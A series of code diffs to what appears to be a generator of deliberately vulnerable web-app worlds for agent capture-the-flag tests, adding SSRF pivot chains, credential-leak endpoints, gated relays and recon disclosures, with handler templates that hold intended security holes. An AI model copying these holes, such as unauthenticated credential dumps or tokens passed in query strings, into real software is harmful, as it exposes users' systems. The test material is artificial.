+                    "username": f"{handle}@{corp_domain}",
                     "role": "admin" if is_admin else "user",
                     "active": True,
                 },

--- a/packs/cyber_webapp/cyber_webapp/sampling.py
+++ b/packs/cyber_webapp/cyber_webapp/sampling.py
@@ -225,11 +225,16 @@ _INTERNAL_ONLY_KINDS: frozenset[str] = frozenset(
         "config_disclosure",
         "credential_leak",
         "credential_gated_flag",
+        "credential_gated_relay",
     }
 )
 
-# Query params the credential-gated internal DB reads the reused token from.
+# Query params the credential-gated internal hosts read the reused token from.
 _TOKEN_PARAMS: tuple[str, ...] = ("token", "api_key", "auth", "session", "key")
+
+# Longest credential-reuse chain the synthesizer composes (number of gated hops); the
+# actual depth is sampled per world and also bounded by the internal hosts available.
+_MAX_CHAIN_DEPTH = 3
 
 # Status/config paths the company recon disclosure mounts on the public service.
 _RECON_PATHS: tuple[str, ...] = (
@@ -1162,11 +1167,13 @@ def _flag_record_id(graph: WorldGraph) -> str | None:
 
 
 def _lateralize(graph: WorldGraph, rng: random.Random) -> None:
-    # Credential-reuse lateral movement. Re-home the SSRF onto the public service in
-    # PROXY mode (the agent drives the pivot to any internal host), leak a db credential
-    # from an internal service, and gate the flag on the internal db behind that reused
-    # credential. The flag is reachable ONLY via the gate: the db record's value goes
-    # decoy, the real flag stays in the secret the gated handler serves.
+    # Compose a credential-reuse chain of sampled depth — the lateral-movement
+    # primitive. Re-home the SSRF into PROXY mode (the agent drives the pivot), then
+    # chain internal hosts: an entry host leaks a db credential, each next host is gated
+    # by the credential leaked one hop back, relaying the next; the last serves it.
+    # Depth is sampled per seed, so one preset synthesizes 1-, 2-, 3-hop chains. The
+    # flag is reachable ONLY via the final gate: the db record's value goes decoy, real
+    # flag stays in the secret the gated handler serves.
     ssrf = next(
         (n for n in graph.by_kind("vulnerability") if n.attrs.get("kind") == "ssrf"),
         None,
@@ -1180,18 +1187,16 @@ def _lateralize(graph: WorldGraph, rng: random.Random) -> None:
         return
     if flag_service_id == public.id:
         return  # the deepest (internal) service bears the flag, never the public one
+    public_ep = next((e.dst for e in graph.out_edges(public.id, "exposes")), None)
+    if public_ep is None:
+        return
     others = [
         n
         for n in graph.by_kind("service")
         if n.attrs.get("exposure") != "public" and n.id != flag_service_id
     ]
     if not others:
-        return  # need a separate internal host to hold the leaked credential
-    metadata_service = min(others, key=lambda n: n.id)
-    flag_service = graph.nodes[flag_service_id]
-    public_ep = next((e.dst for e in graph.out_edges(public.id, "exposes")), None)
-    if public_ep is None:
-        return
+        return  # need a separate internal host to leak the credential from
 
     # 1. Re-home the SSRF onto the public endpoint, in proxy mode (agent-driven).
     for edge in graph.edges.values():
@@ -1208,21 +1213,30 @@ def _lateralize(graph: WorldGraph, rng: random.Random) -> None:
         for n in graph.by_kind("service")
         if n.attrs.get("exposure") != "public"
     )
-    target_param = str(dict(ssrf.attrs.get("params", {})).get("target_param", "url"))
     ssrf.attrs["params"] = {
-        "target_param": target_param,
+        "target_param": str(
+            dict(ssrf.attrs.get("params", {})).get("target_param", "url")
+        ),
         "internal_hosts": internal_names,
     }
 
-    # 2. The reused credential + where it is honored (the internal db's gated vault).
-    credential = _b62(rng, 24)
-    token_param = rng.choice(_TOKEN_PARAMS)
-    flag_name = str(flag_service.attrs.get("name", flag_service_id))
+    # 2. Compose the chain: an entry host + (depth-1) relays + the flag host; depth is
+    #    sampled and bounded by the internal hosts available. ``gated_hosts`` are the
+    #    hosts that require a credential (the relays, then the flag); ``creds[j]`` opens
+    #    ``gated_hosts[j]``.
+    rng.shuffle(others)
+    depth = rng.randint(1, min(_MAX_CHAIN_DEPTH, len(others)))
+    entry = others[0]
+    gated_hosts = [*others[1:depth], graph.nodes[flag_service_id]]
+    creds = [_b62(rng, 24) for _ in range(depth)]
+    tparams = [rng.choice(_TOKEN_PARAMS) for _ in range(depth)]
     gate_path = "/internal/vault"
 
-    # 3. An internal metadata service leaks the credential and how to use it.
-    meta_name = str(metadata_service.attrs.get("name", metadata_service.id))
-    leak_ep_id = f"ep_{meta_name}_credleak"
+    def _name(node: Node) -> str:
+        return str(node.attrs.get("name", node.id))
+
+    # 3. The entry host leaks the first credential and how to reach the first gate.
+    leak_ep_id = f"ep_{_name(entry)}_credleak"
     leak_path = "/internal/credentials"
     graph.add_node(
         Node(
@@ -1230,14 +1244,14 @@ def _lateralize(graph: WorldGraph, rng: random.Random) -> None:
             kind="endpoint",
             attrs={
                 "path": leak_path,
-                "public_url": _public_url(metadata_service.attrs, leak_path),
+                "public_url": _public_url(entry.attrs, leak_path),
                 "method": "GET",
                 "auth_required": False,
                 "behavior_ref": "credential.leak",
             },
         )
     )
-    _add_edge(graph, "exposes", metadata_service.id, leak_ep_id)
+    _add_edge(graph, "exposes", entry.id, leak_ep_id)
     leak_vuln_id = "vuln_credential_leak_0"
     graph.add_node(
         Node(
@@ -1247,9 +1261,9 @@ def _lateralize(graph: WorldGraph, rng: random.Random) -> None:
                 "kind": "credential_leak",
                 "family": "code_web",
                 "params": {
-                    "credential": credential,
-                    "token_param": token_param,
-                    "vault_host": flag_name,
+                    "credential": creds[0],
+                    "token_param": tparams[0],
+                    "vault_host": _name(gated_hosts[0]),
                     "vault_path": gate_path,
                 },
             },
@@ -1257,6 +1271,7 @@ def _lateralize(graph: WorldGraph, rng: random.Random) -> None:
         )
     )
     _add_edge(graph, "affects", leak_vuln_id, leak_ep_id)
+    _add_edge(graph, "enables", ssrf.id, leak_vuln_id)
 
     # 4. The flag record's value goes decoy so the db's default endpoints can't leak it;
     #    the real flag stays in the secret the gated handler serves.
@@ -1267,40 +1282,57 @@ def _lateralize(graph: WorldGraph, rng: random.Random) -> None:
         fields["value"] = f"rotated-{_b62(rng, 8)}"
         record.attrs["fields"] = fields
 
-    # 5. The internal db gates the flag behind the reused credential.
-    gate_ep_id = f"ep_{flag_name}_vault"
-    graph.add_node(
-        Node(
-            id=gate_ep_id,
-            kind="endpoint",
-            attrs={
-                "path": gate_path,
-                "public_url": _public_url(flag_service.attrs, gate_path),
-                "method": "GET",
-                "auth_required": True,
-                "behavior_ref": "credential.gate",
-            },
+    # 5. Each gated host validates the credential leaked one hop back; the last serves
+    #    the flag, the rest relay the next host's credential — composable, any depth.
+    prev_vuln = leak_vuln_id
+    for j, host in enumerate(gated_hosts):
+        ep_id = f"ep_{_name(host)}_vault"
+        graph.add_node(
+            Node(
+                id=ep_id,
+                kind="endpoint",
+                attrs={
+                    "path": gate_path,
+                    "public_url": _public_url(host.attrs, gate_path),
+                    "method": "GET",
+                    "auth_required": True,
+                    "behavior_ref": "credential.gate",
+                },
+            )
         )
-    )
-    _add_edge(graph, "exposes", flag_service_id, gate_ep_id)
-    gate_vuln_id = "vuln_credential_gated_flag_0"
-    graph.add_node(
-        Node(
-            id=gate_vuln_id,
-            kind="vulnerability",
-            attrs={
+        _add_edge(graph, "exposes", host.id, ep_id)
+        if j < depth - 1:
+            vuln_id = f"vuln_credential_gated_relay_{j}"
+            attrs = {
+                "kind": "credential_gated_relay",
+                "family": "code_web",
+                "params": {
+                    "credential": creds[j],
+                    "token_param": tparams[j],
+                    "next_credential": creds[j + 1],
+                    "next_vault_host": _name(gated_hosts[j + 1]),
+                    "next_vault_path": gate_path,
+                    "next_token_param": tparams[j + 1],
+                },
+            }
+        else:
+            vuln_id = "vuln_credential_gated_flag_0"
+            attrs = {
                 "kind": "credential_gated_flag",
                 "family": "code_web",
-                "params": {"credential": credential, "token_param": token_param},
-            },
-            visibility=Visibility.HIDDEN,
+                "params": {"credential": creds[j], "token_param": tparams[j]},
+            }
+        graph.add_node(
+            Node(
+                id=vuln_id,
+                kind="vulnerability",
+                attrs=attrs,
+                visibility=Visibility.HIDDEN,
+            )
         )
-    )
-    _add_edge(graph, "affects", gate_vuln_id, gate_ep_id)
-
-    # 6. The chain: SSRF reaches the leak; the leaked credential opens the gate.
-    _add_edge(graph, "enables", ssrf.id, leak_vuln_id)
-    _add_edge(graph, "enables", leak_vuln_id, gate_vuln_id)
+        _add_edge(graph, "affects", vuln_id, ep_id)
+        _add_edge(graph, "enables", prev_vuln, vuln_id)
+        prev_vuln = vuln_id
 
 
 def _add_edge(

--- a/packs/cyber_webapp/cyber_webapp/sampling.py
+++ b/packs/cyber_webapp/cyber_webapp/sampling.py
@@ -214,10 +214,31 @@ _COMMAND_INJECTION_PARAMS: tuple[str, ...] = (
     "ip",
     "domain",
 )
-# Classes never placed by general sampling: a metadata_credential_leak on a reachable
-# endpoint would hand over the flag with no exploit. It goes only inside the networked
-# SSRF chain, on an INTERNAL service the agent can reach only by pivoting.
-_INTERNAL_ONLY_KINDS: frozenset[str] = frozenset({"metadata_credential_leak"})
+# Classes general sampling never places. A metadata_credential_leak on a reachable
+# endpoint would hand over the flag with no exploit — it goes only inside the networked
+# SSRF chain, on an INTERNAL service the agent reaches by pivoting. A config_disclosure
+# names the internal pivot targets — it is placed only on a company world's public
+# service, by ``_add_recon_disclosure``.
+_INTERNAL_ONLY_KINDS: frozenset[str] = frozenset(
+    {
+        "metadata_credential_leak",
+        "config_disclosure",
+        "credential_leak",
+        "credential_gated_flag",
+    }
+)
+
+# Query params the credential-gated internal DB reads the reused token from.
+_TOKEN_PARAMS: tuple[str, ...] = ("token", "api_key", "auth", "session", "key")
+
+# Status/config paths the company recon disclosure mounts on the public service.
+_RECON_PATHS: tuple[str, ...] = (
+    "/status",
+    "/debug",
+    "/_info",
+    "/health/internal",
+    "/.well-known/app-config",
+)
 
 _COMMAND_INJECTION_BASE: tuple[str, ...] = (
     "ping",
@@ -387,18 +408,8 @@ def sample_graph(
     the prior never dictates specific outputs."""
     graph = WorldGraph(ontology=ONTOLOGY_ID)
 
-    network_id = "net_main"
-    graph.add_node(
-        Node(
-            id=network_id,
-            kind="network",
-            attrs={
-                "name": "main",
-                "isolation": "bridge",
-                "zone": "dmz",
-            },
-        )
-    )
+    company = _is_company(prior)
+    _add_networks(graph, company)
     graph.meta["discovery_title"] = rng.choice(DISCOVERY_TITLES)
 
     services = _sample_services(rng, prior)
@@ -432,7 +443,12 @@ def sample_graph(
             )
         )
         _add_edge(graph, "runs_on", service_id, host_id)
-        _add_edge(graph, "connected_to", service_id, network_id)
+        _add_edge(
+            graph,
+            "connected_to",
+            service_id,
+            _network_for(company, str(service["exposure"])),
+        )
 
         for endpoint in _sample_endpoints(rng, prior, service):
             graph.add_node(endpoint)
@@ -507,9 +523,56 @@ def sample_graph(
         oracle_service_id=deepest_service_id,
         oracle_shapes=_ORACLE_SHAPES_FOR_LOOT[loot_shape],
     )
-    _networkize_ssrf(graph)
+    if _is_lateral(prior):
+        _lateralize(graph, rng)
+    else:
+        _networkize_ssrf(graph)
+    if company:
+        _add_recon_disclosure(graph, rng)
 
     return graph
+
+
+def _is_company(prior: PackPrior | None) -> bool:
+    return bool(prior is not None and prior.topology.get("preset") == "company")
+
+
+def _is_lateral(prior: PackPrior | None) -> bool:
+    return bool(prior is not None and prior.topology.get("lateral"))
+
+
+def _add_networks(graph: WorldGraph, company: bool) -> None:
+    if not company:
+        graph.add_node(
+            Node(
+                id="net_main",
+                kind="network",
+                attrs={"name": "main", "isolation": "bridge", "zone": "dmz"},
+            )
+        )
+        return
+    # A company estate is segmented: the public service sits in the dmz; the internal
+    # services share an isolated internal segment.
+    graph.add_node(
+        Node(
+            id="net_dmz",
+            kind="network",
+            attrs={"name": "dmz", "isolation": "bridge", "zone": "dmz"},
+        )
+    )
+    graph.add_node(
+        Node(
+            id="net_internal",
+            kind="network",
+            attrs={"name": "internal", "isolation": "isolated", "zone": "corp"},
+        )
+    )
+
+
+def _network_for(company: bool, exposure: str) -> str:
+    if not company:
+        return "net_main"
+    return "net_dmz" if exposure == "public" else "net_internal"
 
 
 def _sample_services(
@@ -1021,6 +1084,223 @@ def _networkize_ssrf(graph: WorldGraph) -> None:
     )
     _add_edge(graph, "affects", meta_vuln_id, meta_ep_id)
     _add_edge(graph, "enables", ssrf.id, meta_vuln_id)
+
+
+def _add_recon_disclosure(graph: WorldGraph, rng: random.Random) -> None:
+    # A company world is solvable by recon: a public status endpoint over-shares the
+    # internal hostnames the SSRF can pivot to. It names candidates, not the flag — the
+    # agent still has to find the one that leaks and bypass the SSRF filter to reach it.
+    ssrf = next(
+        (n for n in graph.by_kind("vulnerability") if n.attrs.get("kind") == "ssrf"),
+        None,
+    )
+    public = next(
+        (n for n in graph.by_kind("service") if n.attrs.get("exposure") == "public"),
+        None,
+    )
+    if ssrf is None or public is None:
+        return
+    internal_names = sorted(
+        str(n.attrs.get("name"))
+        for n in graph.by_kind("service")
+        if n.attrs.get("exposure") != "public"
+    )
+    if not internal_names:
+        return
+    params = ssrf.attrs.get("params", {})
+    internal_path = (
+        str(params.get("internal_path", _METADATA_PATH))
+        if isinstance(params, Mapping)
+        else _METADATA_PATH
+    )
+    public_name = str(public.attrs.get("name", "web"))
+    path = rng.choice(_RECON_PATHS)
+    ep_id = f"ep_{public_name}_recon"
+    graph.add_node(
+        Node(
+            id=ep_id,
+            kind="endpoint",
+            attrs={
+                "path": path,
+                "public_url": _public_url(public.attrs, path),
+                "method": "GET",
+                "auth_required": False,
+                "behavior_ref": "config.disclosure",
+            },
+        )
+    )
+    _add_edge(graph, "exposes", public.id, ep_id)
+    vuln_id = "vuln_config_disclosure_0"
+    graph.add_node(
+        Node(
+            id=vuln_id,
+            kind="vulnerability",
+            attrs={
+                "kind": "config_disclosure",
+                "family": "code_web",
+                "params": {
+                    "internal_services": internal_names,
+                    "internal_path": internal_path,
+                },
+            },
+            visibility=Visibility.HIDDEN,
+        )
+    )
+    _add_edge(graph, "affects", vuln_id, ep_id)
+
+
+def _flag_record_id(graph: WorldGraph) -> str | None:
+    flag = next(
+        (n for n in graph.by_kind("secret") if n.attrs.get("kind") == "flag"), None
+    )
+    if flag is None:
+        return None
+    return next(
+        (e.src for e in graph.edges.values() if e.kind == "holds" and e.dst == flag.id),
+        None,
+    )
+
+
+def _lateralize(graph: WorldGraph, rng: random.Random) -> None:
+    # Credential-reuse lateral movement. Re-home the SSRF onto the public service in
+    # PROXY mode (the agent drives the pivot to any internal host), leak a db credential
+    # from an internal service, and gate the flag on the internal db behind that reused
+    # credential. The flag is reachable ONLY via the gate: the db record's value goes
+    # decoy, the real flag stays in the secret the gated handler serves.
+    ssrf = next(
+        (n for n in graph.by_kind("vulnerability") if n.attrs.get("kind") == "ssrf"),
+        None,
+    )
+    public = next(
+        (n for n in graph.by_kind("service") if n.attrs.get("exposure") == "public"),
+        None,
+    )
+    flag_service_id = _flag_service_id(graph)
+    if ssrf is None or public is None or flag_service_id is None:
+        return
+    if flag_service_id == public.id:
+        return  # the deepest (internal) service bears the flag, never the public one
+    others = [
+        n
+        for n in graph.by_kind("service")
+        if n.attrs.get("exposure") != "public" and n.id != flag_service_id
+    ]
+    if not others:
+        return  # need a separate internal host to hold the leaked credential
+    metadata_service = min(others, key=lambda n: n.id)
+    flag_service = graph.nodes[flag_service_id]
+    public_ep = next((e.dst for e in graph.out_edges(public.id, "exposes")), None)
+    if public_ep is None:
+        return
+
+    # 1. Re-home the SSRF onto the public endpoint, in proxy mode (agent-driven).
+    for edge in graph.edges.values():
+        if edge.kind == "affects" and edge.src == ssrf.id:
+            edge.dst = public_ep
+            edge.attrs = {
+                "injection_site": str(
+                    graph.nodes[public_ep].attrs.get("path", "service")
+                )
+            }
+            break
+    internal_names = sorted(
+        str(n.attrs.get("name"))
+        for n in graph.by_kind("service")
+        if n.attrs.get("exposure") != "public"
+    )
+    target_param = str(dict(ssrf.attrs.get("params", {})).get("target_param", "url"))
+    ssrf.attrs["params"] = {
+        "target_param": target_param,
+        "internal_hosts": internal_names,
+    }
+
+    # 2. The reused credential + where it is honored (the internal db's gated vault).
+    credential = _b62(rng, 24)
+    token_param = rng.choice(_TOKEN_PARAMS)
+    flag_name = str(flag_service.attrs.get("name", flag_service_id))
+    gate_path = "/internal/vault"
+
+    # 3. An internal metadata service leaks the credential and how to use it.
+    meta_name = str(metadata_service.attrs.get("name", metadata_service.id))
+    leak_ep_id = f"ep_{meta_name}_credleak"
+    leak_path = "/internal/credentials"
+    graph.add_node(
+        Node(
+            id=leak_ep_id,
+            kind="endpoint",
+            attrs={
+                "path": leak_path,
+                "public_url": _public_url(metadata_service.attrs, leak_path),
+                "method": "GET",
+                "auth_required": False,
+                "behavior_ref": "credential.leak",
+            },
+        )
+    )
+    _add_edge(graph, "exposes", metadata_service.id, leak_ep_id)
+    leak_vuln_id = "vuln_credential_leak_0"
+    graph.add_node(
+        Node(
+            id=leak_vuln_id,
+            kind="vulnerability",
+            attrs={
+                "kind": "credential_leak",
+                "family": "code_web",
+                "params": {
+                    "credential": credential,
+                    "token_param": token_param,
+                    "vault_host": flag_name,
+                    "vault_path": gate_path,
+                },
+            },
+            visibility=Visibility.HIDDEN,
+        )
+    )
+    _add_edge(graph, "affects", leak_vuln_id, leak_ep_id)
+
+    # 4. The flag record's value goes decoy so the db's default endpoints can't leak it;
+    #    the real flag stays in the secret the gated handler serves.
+    flag_record_id = _flag_record_id(graph)
+    if flag_record_id is not None and flag_record_id in graph.nodes:
+        record = graph.nodes[flag_record_id]
+        fields = dict(record.attrs.get("fields", {}))
+        fields["value"] = f"rotated-{_b62(rng, 8)}"
+        record.attrs["fields"] = fields
+
+    # 5. The internal db gates the flag behind the reused credential.
+    gate_ep_id = f"ep_{flag_name}_vault"
+    graph.add_node(
+        Node(
+            id=gate_ep_id,
+            kind="endpoint",
+            attrs={
+                "path": gate_path,
+                "public_url": _public_url(flag_service.attrs, gate_path),
+                "method": "GET",
+                "auth_required": True,
+                "behavior_ref": "credential.gate",
+            },
+        )
+    )
+    _add_edge(graph, "exposes", flag_service_id, gate_ep_id)
+    gate_vuln_id = "vuln_credential_gated_flag_0"
+    graph.add_node(
+        Node(
+            id=gate_vuln_id,
+            kind="vulnerability",
+            attrs={
+                "kind": "credential_gated_flag",
+                "family": "code_web",
+                "params": {"credential": credential, "token_param": token_param},
+            },
+            visibility=Visibility.HIDDEN,
+        )
+    )
+    _add_edge(graph, "affects", gate_vuln_id, gate_ep_id)
+
+    # 6. The chain: SSRF reaches the leak; the leaked credential opens the gate.
+    _add_edge(graph, "enables", ssrf.id, leak_vuln_id)
+    _add_edge(graph, "enables", leak_vuln_id, gate_vuln_id)
 
 
 def _add_edge(

--- a/packs/cyber_webapp/cyber_webapp/sampling.py
+++ b/packs/cyber_webapp/cyber_webapp/sampling.py
@@ -145,6 +145,34 @@ _CORP_DOMAINS: tuple[str, ...] = (
 _HOST_ENVS: tuple[str, ...] = ("prod", "stg", "infra")
 
 
+# Realistic service names by kind, sampled deterministically so a world reads like a
+# real company's estate rather than ``api1`` / ``db2`` (DESIGN.md §2: realism is
+# procedural-first, from curated pools). Hyphen-safe so a name doubles as a docker host.
+_SERVICE_NAMES_BY_KIND: Mapping[str, tuple[str, ...]] = {
+    "web": ("storefront", "customer-portal", "shop", "portal", "dashboard", "www-app"),
+    "api": (
+        "orders-api",
+        "catalog-api",
+        "payments-api",
+        "inventory-api",
+        "checkout-api",
+        "billing-api",
+    ),
+    "auth": ("identity", "sso-gateway", "accounts", "login-service", "idp"),
+    "db": (
+        "orders-db",
+        "users-db",
+        "billing-db",
+        "ledger-db",
+        "records-db",
+        "warehouse-db",
+    ),
+    "queue": ("jobs-queue", "event-bus", "broker"),
+    "mail": ("mailer", "smtp-relay", "notifications"),
+    "fileshare": ("file-store", "documents", "asset-store"),
+}
+
+
 # Vuln-parameter pools sampled per-build so exploit payloads (e.g. which header
 # carries the privileged role) differ across builds rather than being constant.
 _SQLI_PARAMS: tuple[str, ...] = ("q", "query", "search", "term", "filter", "ref")
@@ -586,28 +614,44 @@ def _sample_services(
 ) -> list[dict[str, str]]:
     count = _sample_int(rng, prior, "service_count")
     kinds_pool = _weighted_pool(prior, "service_kinds", exclude=("web",))
+    used_names: set[str] = set()
     services: list[dict[str, str]] = [
         {
-            "name": "web",
+            "name": _service_name("web", used_names),
             "kind": "web",
             "language": "python",
             "exposure": "public",
         },
     ]
-    used_names = {"web"}
     for _ in range(count - 1):
         kind = rng.choice(kinds_pool) if kinds_pool else "api"
-        name = _unique_name(kind, used_names)
-        used_names.add(name)
         services.append(
             {
-                "name": name,
+                "name": _service_name(kind, used_names),
                 "kind": kind,
                 "language": "python",
                 "exposure": "internal",
             },
         )
     return services
+
+
+def _service_name(kind: str, used: set[str]) -> str:
+    # A realistic name from the kind's pool, distinct within the world. Deterministic
+    # (no rng draw) so adding it does not shift the structural sampling stream — the
+    # world is the same one, just better-named; the pool order gives the assignment.
+    pool = _SERVICE_NAMES_BY_KIND.get(kind, (kind,))
+    for name in pool:
+        if name not in used:
+            used.add(name)
+            return name
+    base = pool[0]
+    i = 2
+    while f"{base}-{i}" in used:
+        i += 1
+    name = f"{base}-{i}"
+    used.add(name)
+    return name
 
 
 def _sample_endpoints(
@@ -1224,7 +1268,11 @@ def _lateralize(graph: WorldGraph, rng: random.Random) -> None:
     #    sampled and bounded by the internal hosts available. ``gated_hosts`` are the
     #    hosts that require a credential (the relays, then the flag); ``creds[j]`` opens
     #    ``gated_hosts[j]``.
-    rng.shuffle(others)
+    # Order the chain to pivot INWARD through the tiers — shallow services first, toward
+    # the deep db that bears the flag — so the lateral movement reads architecturally
+    # (web -> api -> auth -> db) rather than hopping random hosts.
+    tier = {"web": 1, "api": 2, "auth": 3, "db": 4}
+    others.sort(key=lambda n: (tier.get(str(n.attrs.get("kind")), 2), n.id))
     depth = rng.randint(1, min(_MAX_CHAIN_DEPTH, len(others)))
     entry = others[0]
     gated_hosts = [*others[1:depth], graph.nodes[flag_service_id]]
@@ -1442,16 +1490,6 @@ def _prior_weights(
             continue
         out[name] = weight
     return out
-
-
-def _unique_name(kind: str, used: set[str]) -> str:
-    base = kind
-    if base not in used:
-        return base
-    i = 1
-    while f"{base}{i}" in used:
-        i += 1
-    return f"{base}{i}"
 
 
 def _pick_deepest_service(

--- a/packs/cyber_webapp/cyber_webapp/vulnerabilities/__init__.py
+++ b/packs/cyber_webapp/cyber_webapp/vulnerabilities/__init__.py
@@ -242,6 +242,65 @@ METADATA_CREDENTIAL_LEAK = Vulnerability(
 )
 
 
+CONFIG_DISCLOSURE = Vulnerability(
+    id="config_disclosure",
+    family="code_web",
+    description=(
+        "A public status/config endpoint over-shares internal infrastructure — it "
+        "names the internal hosts the app can reach. Recon for the SSRF pivot, not a "
+        "flag leak: it discloses the candidate internal targets, never the secret. "
+        "Placed only on a company world's public service, never by general sampling."
+    ),
+    target_kinds=frozenset({"endpoint"}),
+    template="config_disclosure.py.j2",
+    shape="response_leak",
+    attrs_schema={
+        "internal_services": "internal hostnames disclosed (the SSRF's targets)",
+        "internal_path": "the internal metadata path the disclosure names",
+    },
+)
+
+
+CREDENTIAL_LEAK = Vulnerability(
+    id="credential_leak",
+    family="code_web",
+    description=(
+        "An unauthenticated internal endpoint hands out a service credential (a db "
+        "token) on a plain GET. Reachable only by pivoting; the leaked token is the "
+        "intermediate loot the agent reuses to reach the internal DB. The internal "
+        "half of a lateral-movement chain — never placed by general sampling."
+    ),
+    target_kinds=frozenset({"endpoint"}),
+    template="credential_leak.py.j2",
+    shape="response_leak",
+    attrs_schema={
+        "credential": "the db token this endpoint discloses",
+        "vault_host": "internal host the token authenticates to",
+        "vault_path": "path on that host the token opens",
+        "token_param": "query parameter the token must be presented in",
+    },
+)
+
+
+CREDENTIAL_GATED_FLAG = Vulnerability(
+    id="credential_gated_flag",
+    family="code_web",
+    description=(
+        "An internal data endpoint that serves the flag only to a caller presenting "
+        "the db token leaked elsewhere — the lateral-movement target. Solvable only by "
+        "reusing the credential moved over from the metadata host. Never placed by "
+        "general sampling."
+    ),
+    target_kinds=frozenset({"endpoint"}),
+    template="credential_gated_flag.py.j2",
+    shape="response_leak",
+    attrs_schema={
+        "credential": "the db token a caller must present",
+        "token_param": "query parameter the token is read from",
+    },
+)
+
+
 CATALOG: Mapping[str, Vulnerability] = {
     SQL_INJECTION.id: SQL_INJECTION,
     SSRF.id: SSRF,
@@ -253,6 +312,9 @@ CATALOG: Mapping[str, Vulnerability] = {
     IDOR.id: IDOR,
     WEAK_CREDENTIALS.id: WEAK_CREDENTIALS,
     METADATA_CREDENTIAL_LEAK.id: METADATA_CREDENTIAL_LEAK,
+    CONFIG_DISCLOSURE.id: CONFIG_DISCLOSURE,
+    CREDENTIAL_LEAK.id: CREDENTIAL_LEAK,
+    CREDENTIAL_GATED_FLAG.id: CREDENTIAL_GATED_FLAG,
 }
 
 
@@ -325,6 +387,9 @@ __all__ = [
     "BROKEN_AUTHZ",
     "CATALOG",
     "COMMAND_INJECTION",
+    "CONFIG_DISCLOSURE",
+    "CREDENTIAL_GATED_FLAG",
+    "CREDENTIAL_LEAK",
     "IDOR",
     "METADATA_CREDENTIAL_LEAK",
     "PATH_TRAVERSAL",

--- a/packs/cyber_webapp/cyber_webapp/vulnerabilities/__init__.py
+++ b/packs/cyber_webapp/cyber_webapp/vulnerabilities/__init__.py
@@ -301,6 +301,28 @@ CREDENTIAL_GATED_FLAG = Vulnerability(
 )
 
 
+CREDENTIAL_GATED_RELAY = Vulnerability(
+    id="credential_gated_relay",
+    family="code_web",
+    description=(
+        "An intermediate internal relay: validates the reused db token, then hands "
+        "over the NEXT host's credential and how to reach it. One composable hop of an "
+        "arbitrary-depth lateral chain. Never placed by general sampling."
+    ),
+    target_kinds=frozenset({"endpoint"}),
+    template="credential_gated_relay.py.j2",
+    shape="response_leak",
+    attrs_schema={
+        "credential": "the db token a caller must present to pass this hop",
+        "token_param": "query parameter the token is read from",
+        "next_credential": "the credential handed over for the next host",
+        "next_vault_host": "the next host on the chain",
+        "next_vault_path": "the next host's gated path",
+        "next_token_param": "the query parameter the next host reads its token from",
+    },
+)
+
+
 CATALOG: Mapping[str, Vulnerability] = {
     SQL_INJECTION.id: SQL_INJECTION,
     SSRF.id: SSRF,
@@ -315,6 +337,7 @@ CATALOG: Mapping[str, Vulnerability] = {
     CONFIG_DISCLOSURE.id: CONFIG_DISCLOSURE,
     CREDENTIAL_LEAK.id: CREDENTIAL_LEAK,
     CREDENTIAL_GATED_FLAG.id: CREDENTIAL_GATED_FLAG,
+    CREDENTIAL_GATED_RELAY.id: CREDENTIAL_GATED_RELAY,
 }
 
 
@@ -389,6 +412,7 @@ __all__ = [
     "COMMAND_INJECTION",
     "CONFIG_DISCLOSURE",
     "CREDENTIAL_GATED_FLAG",
+    "CREDENTIAL_GATED_RELAY",
     "CREDENTIAL_LEAK",
     "IDOR",
     "METADATA_CREDENTIAL_LEAK",

--- a/packs/cyber_webapp/cyber_webapp/vulnerabilities/templates/config_disclosure.py.j2
+++ b/packs/cyber_webapp/cyber_webapp/vulnerabilities/templates/config_disclosure.py.j2
@@ -1,0 +1,18 @@
+"""Internal-infrastructure disclosure — an over-sharing status/config endpoint.
+
+Models a debug or status page left exposed on a public service: it names the internal
+hosts the application can reach. This is recon, not the flag — it hands the agent the
+candidate pivot targets for the SSRF, it never returns the secret itself.
+"""
+
+import json
+
+
+def handle(query, state):
+    del query, state
+    config = {
+        "app": "status",
+        "upstreams": {{ internal_services | tojson }},
+        "metadata_path": {{ internal_path | tojson }},
+    }
+    return 200, {"Content-Type": "application/json"}, json.dumps(config).encode()

--- a/packs/cyber_webapp/cyber_webapp/vulnerabilities/templates/credential_gated_flag.py.j2
+++ b/packs/cyber_webapp/cyber_webapp/vulnerabilities/templates/credential_gated_flag.py.j2
@@ -1,0 +1,20 @@
+"""Internal data endpoint gated by a reused credential — the lateral-movement target.
+
+Serves the flag ONLY to a caller that presents the database token leaked by the
+internal metadata service; any other request is denied. Reached by pivoting (the SSRF
+proxy) and only solvable once the credential has been moved over from the other host.
+"""
+
+import json
+
+
+def handle(query, state):
+    token = (query.get({{ token_param | tojson }}, [""]) or [""])[0]
+    if token != {{ credential | tojson }}:
+        return 403, {"Content-Type": "application/json"}, b'{"error": "forbidden"}'
+    secret = state.get("secrets", {}).get("flag", "")
+    return (
+        200,
+        {"Content-Type": "application/json"},
+        json.dumps({"record": secret}).encode(),
+    )

--- a/packs/cyber_webapp/cyber_webapp/vulnerabilities/templates/credential_gated_relay.py.j2
+++ b/packs/cyber_webapp/cyber_webapp/vulnerabilities/templates/credential_gated_relay.py.j2
@@ -1,0 +1,22 @@
+"""Internal relay gated by a reused credential — an intermediate lateral-movement hop.
+
+Validates the db token presented (the credential leaked one host back) and, only then,
+hands over the NEXT host's credential and how to reach it. Reached by pivoting; advances
+the chain one host deeper without ever exposing the flag.
+"""
+
+import json
+
+
+def handle(query, state):
+    del state
+    token = (query.get({{ token_param | tojson }}, [""]) or [""])[0]
+    if token != {{ credential | tojson }}:
+        return 403, {"Content-Type": "application/json"}, b'{"error": "forbidden"}'
+    config = {
+        "db_token": {{ next_credential | tojson }},
+        "vault_host": {{ next_vault_host | tojson }},
+        "vault_path": {{ next_vault_path | tojson }},
+        "auth_param": {{ next_token_param | tojson }},
+    }
+    return 200, {"Content-Type": "application/json"}, json.dumps(config).encode()

--- a/packs/cyber_webapp/cyber_webapp/vulnerabilities/templates/credential_leak.py.j2
+++ b/packs/cyber_webapp/cyber_webapp/vulnerabilities/templates/credential_leak.py.j2
@@ -1,0 +1,20 @@
+"""Internal credential disclosure — an unauthenticated internal endpoint that dumps a
+service's connection config on a plain GET.
+
+Models an internal metadata / config endpoint that trusts its callers: it returns the
+db token AND how to use it (the vault host, path, and auth parameter). Reachable only by
+pivoting; the disclosed token is the intermediate loot — reused to open the internal db.
+"""
+
+import json
+
+
+def handle(query, state):
+    del query, state
+    config = {
+        "db_token": {{ credential | tojson }},
+        "vault_host": {{ vault_host | tojson }},
+        "vault_path": {{ vault_path | tojson }},
